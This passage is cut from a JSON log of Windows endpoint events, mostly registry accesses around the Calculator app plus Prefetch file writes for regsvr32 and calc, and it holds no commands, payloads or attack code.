Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573248860000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573248860000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573248860000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "timestamp": 131883573249009984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\ShowInSwitchers", - "registry_value": "ShowInSwitchers", - "timestamp": 131883573249009984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "timestamp": 131883573249170000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883573249170000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249480000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-55A4EE79.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573249640000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-A65A209D.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-A65A209D.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573249640000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "CALC.EXE-AC08706A.pf", - "file_path": "C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573249640000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 